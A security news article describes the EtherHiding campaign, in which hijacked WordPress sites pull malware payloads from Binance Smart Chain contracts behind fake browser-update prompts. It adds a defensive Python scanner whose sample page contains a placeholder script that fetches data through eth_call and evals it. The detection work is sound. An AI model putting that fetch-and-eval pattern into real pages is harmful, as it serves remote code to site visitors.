A new threat lurks in the Binance Smart Chain. Security researchers have recently uncovered a malware campaign that abuses BSC smart contracts. The campaign, known as “EtherHiding,” uses a devious tactic to spread malware to unsuspecting users: the attackers compromise WordPress websites and inject them with malicious code that retrieves partial payloads from blockchain contracts.
Guardio Labs researchers, in a detailed report following two months of extensive study involving hijacked WordPress sites, revealed the intricacies of this new threat. The attackers entice users into downloading seemingly legitimate “browser updates.” Through this method, the cybercriminals can remotely control the infection process. They can display tailored messages, change strategies, update blocked domains, and replace detected payloads without needing to re-access the WordPress sites, making it exceptionally challenging to counter.
In the last 2 months or so, we have been facing yet another “fake-update” malware propagation campaign. In the attack flow, a site is defaced with a very believable overlay demanding a browser update before the site can be accessed. The fake “update” turns out to be vicious infostealer malware like RedLine, Amadey, or Lumma.
Initially, the attackers hosted their code on abused Cloudflare Workers hosts, but after those were taken down, they swiftly adapted their strategy to exploit the decentralized, anonymous, and public nature of blockchain technology. This shift has made their campaign even more elusive and difficult to disrupt.
Binance Smart Chain Malware: The Double-Edged Sword of Decentralized Technology
Binance Smart Chain, launched three years ago, is built around smart contracts: coded agreements that automatically execute actions when specific conditions are met. Because the chain is public and immutable, code can be hosted “on-chain,” where it is impervious to takedowns. This characteristic, while advantageous, also poses a significant challenge, as this attack illustrates: the injected script on a compromised site simply reads its payload back out of a contract, so the malicious code is hosted and served in a manner that cannot be blocked at the hosting layer, highlighting the double-edged sword of decentralized technology.
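Because the on-chain payload itself cannot be taken down, defenders have to catch the injection on the compromised site instead. The following scanner is an added example, not code from Guardio Labs or the article: it pulls every inline script out of a page and flags scripts that combine a read from a BSC JSON-RPC endpoint (a hostname beginning with bsc-dataseed, the public BSC RPC naming convention, and the eth_call method) with dynamic code execution. The indicator patterns, the severity scoring, and the sample page are assumptions constructed for illustration, not indicators published in the report.

```python
"""Heuristic scanner for injected inline scripts that fetch code from a blockchain RPC.

Added example, not from the article or Guardio Labs. The indicator strings below are
assumptions chosen for illustration; tune them against your own site telemetry.
"""
import re
from html.parser import HTMLParser
from typing import Dict, List

# Indicator patterns (assumptions for this example, not IoCs from the article).
INDICATORS = {
    # Public BSC JSON-RPC endpoints conventionally start with "bsc-dataseed".
    "bsc_rpc_endpoint": re.compile(r"https?://bsc-dataseed[\w.-]*", re.I),
    # JSON-RPC method that reads contract state without sending a transaction.
    "eth_call": re.compile(r"\beth_call\b"),
    # A 20-byte (40 hex digit) contract address.
    "contract_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    # Dynamic execution sinks: whatever came back from the chain gets run.
    "dynamic_eval": re.compile(r"\b(eval|Function)\s*\("),
    # Wording typical of fake browser-update overlays.
    "fake_update_text": re.compile(r"update\s+(your\s+)?browser", re.I),
}


class _ScriptCollector(HTMLParser):
    """Collects the body of each inline <script> element, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self._in_script = False
        self._buf: List[str] = []
        self.scripts: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.scripts.append("".join(self._buf))

    def handle_data(self, data):
        # HTMLParser treats <script> content as CDATA and delivers it here verbatim.
        if self._in_script:
            self._buf.append(data)


def extract_inline_scripts(html: str) -> List[str]:
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def scan_script(script: str) -> List[str]:
    """Return the names of all indicators that match one script body."""
    return [name for name, rx in INDICATORS.items() if rx.search(script)]


def scan_html(html: str) -> List[Dict]:
    """Scan every inline script; rate highest those that read the chain AND execute the result."""
    findings = []
    for idx, script in enumerate(extract_inline_scripts(html)):
        hits = scan_script(script)
        reads_chain = "bsc_rpc_endpoint" in hits or "eth_call" in hits
        executes = "dynamic_eval" in hits
        if reads_chain and executes:
            severity = "high"
        elif hits:
            severity = "medium"
        else:
            severity = "none"
        findings.append({"script_index": idx, "indicators": hits, "severity": severity})
    return findings


# Constructed sample page: one benign analytics stub and one script shaped like the
# injection the article describes (placeholder host and all-zero address, not real IoCs).
SAMPLE_PAGE = """<html><head>
<script>window.dataLayer = window.dataLayer || [];</script>
</head><body>
<h1>Welcome</h1>
<script>
// constructed sample: read bytes out of a contract and execute them
fetch("https://bsc-dataseed.example.invalid/", {method: "POST",
  body: JSON.stringify({jsonrpc: "2.0", method: "eth_call",
  params: [{to: "0x0000000000000000000000000000000000000000", data: "0x"}, "latest"], id: 1})})
  .then(r => r.json()).then(j => eval(hexToText(j.result)));
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_PAGE):
        print(finding)
```

Run the scanner over a saved copy of each page (or over the rendered DOM, since some injections are only assembled client-side) from a host that is not already trusted by the site, and treat any “high” finding as a reason to compare the theme and plugin files against a known-good copy. The scoring deliberately requires both a chain read and an execution sink so that legitimate web3 frontends, which read contracts but never eval the response, land at “medium” rather than “high”.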
Guardio Labs advised site owners to safeguard their sites by keeping their WordPress installation and plugins up to date. Additionally, securing credentials, using strong and regularly changed passwords, and remaining vigilant about activity on their sites are key measures in defending against evolving cyber threats.